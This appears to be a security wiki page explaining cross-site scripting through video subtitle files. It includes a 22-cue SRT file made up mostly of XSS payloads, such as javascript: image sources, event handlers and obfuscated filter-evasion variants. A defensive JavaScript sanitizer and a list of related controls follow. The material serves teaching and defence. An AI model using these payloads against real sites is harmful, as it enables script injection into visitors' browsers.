Overview
An attacker may execute JavaScript through a video's subtitles. This is also known as XSS (Cross-Site Scripting). If the website loads the subtitle file in the browser and renders its text as HTML rather than as plain text, an attacker can run arbitrary HTML or JavaScript from inside the video's subtitles. This has been tested on several video services.
Examples
An attacker can save the content below in SRT format and upload the prepared .srt file as the video's subtitles:
1
00:00:37,618 --> 00:00:42,557
<font color="#ffff00">: '';!--"<XSS>=&{()}</font>
2
00:00:58,425 --> 00:01:00,704
<IMG SRC="javascript:alert('XSS');">
3
00:01:00,705 --> 00:01:01,873
<IMG SRC=javascript:alert('XSS')>
4
00:01:02,225 --> 00:01:04,519
<IMG SRC=javascript:alert('XSS')>
5
00:01:04,520 --> 00:01:05,547
<IMG SRC=javascript:alert('XSS')>
6
00:01:05,864 --> 00:01:08,117
<IMG SRC=javascript:alert('XSS')>
7
00:01:08,224 --> 00:01:09,223
<IMG """>alert("XSS")">
8
00:01:09,224 --> 00:01:10,434
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
9
00:01:11,384 --> 00:01:12,427
<IMG SRC=# onmouseover="alert('xxs')">
10
00:01:15,504 --> 00:01:17,506
<IMG SRC= onmouseover="alert('xxs')">
11
00:01:19,743 --> 00:01:20,786
<IMG onmouseover="alert('xxs')">
12
00:01:24,183 --> 00:01:25,351
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
13
00:01:40,663 --> 00:01:41,705
<img src=x onerror="javascript:alert('XSS')">
14
00:01:42,703 --> 00:01:45,742
<IMG SRC=javascript:alert( 'XSS')>
15
00:01:45,743 --> 00:01:46,285
<IMG SRC=javascript:a& #0000108ert('XSS')>
16
00:01:48,503 --> 00:01:49,545
<IMG SRC=javascript:alert('XSS')>
17
00:01:49,582 --> 00:01:51,709
<IMG SRC=javascript:alert('XSS')>
18
00:01:54,822 --> 00:01:58,200
<IMG SRC="jav ascript:alert('XSS');">
19
00:02:01,021 --> 00:02:03,691
<IMG SRC="jav ascript:alert('XSS');">
20
00:02:04,702 --> 00:02:05,744
<IMG SRC="jav
ascript:alert('XSS');">
21
00:02:15,700 --> 00:02:18,536
<IMG SRC="javascript:alert('XSS')"
22
00:02:18,740 --> 00:02:22,619
\";alert('XSS');//
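The defensive counterpart, as an added example that is not part of the original page: a subtitle renderer that parses SRT cues and escapes every cue before display, then re-enables only the formatting tags a caption legitimately needs. The function names (parseSrt, sanitizeCueText, renderSafeCues), the allowlist of b/i/u/font, and the sample SRT are assumptions constructed for this example.

```javascript
// Added example (not from the original page): parse an SRT file and render
// cue text safely in the browser by escaping all HTML first, then restoring
// only a small allowlist of formatting tags that subtitles commonly use.

// Constructed sample: cue 1 uses legitimate formatting, cue 2 carries an
// injected <img onerror> of the kind shown in the examples above.
const SAMPLE_SRT = [
  "1",
  "00:00:37,618 --> 00:00:42,557",
  '<font color="#ffff00">Hello <i>world</i></font>',
  "",
  "2",
  "00:00:58,425 --> 00:01:00,704",
  '<img src=x onerror="alert(\'XSS\')">',
  "",
].join("\n");

// Split an SRT document into { index, start, end, text } cues.
function parseSrt(srt) {
  return srt.replace(/\r\n/g, "\n").trim().split(/\n{2,}/).map((block) => {
    const [index, timing, ...text] = block.split("\n");
    const [start, end] = timing.split("-->").map((s) => s.trim());
    return { index: Number(index), start, end, text: text.join("\n") };
  });
}

// Escape every character that can open a tag, attribute or entity.
function escapeHtml(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")
          .replace(/"/g, "&quot;").replace(/'/g, "&#39;");
}

// After escaping, restore only <b>, <i>, <u> and <font color="#rrggbb">.
// Anything else (img, script, event handlers, javascript: URLs) stays inert text.
function sanitizeCueText(text) {
  return escapeHtml(text)
    .replace(/&lt;(\/?)(b|i|u)&gt;/gi, "<$1$2>")
    .replace(/&lt;font color=&quot;(#[0-9a-f]{6})&quot;&gt;/gi, '<font color="$1">')
    .replace(/&lt;\/font&gt;/gi, "</font>");
}

// Produce the HTML fragments a player could assign to its caption element.
function renderSafeCues(srt) {
  return parseSrt(srt).map((cue) => ({ ...cue, html: sanitizeCueText(cue.text) }));
}
```

Because the allowlist is applied after escaping, a payload that is not an exact match for one of the permitted tags can never reach the DOM as markup.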
Author and Primary Editor
Mohammad MortazaviZade – 2mzrp2@gmail.com
Related Attacks
- XSS Attacks
- Injection Attack
- Invoking untrusted mobile code
- Cross Site History Manipulation (XSHM)
Related Vulnerabilities
- Input Validation Vulnerability
- Cross Site Scripting Flaw
- Types of Cross-Site Scripting
Related Controls
- Input Validation
- HTML Entity Encoding
- Output Validation
- Canonicalization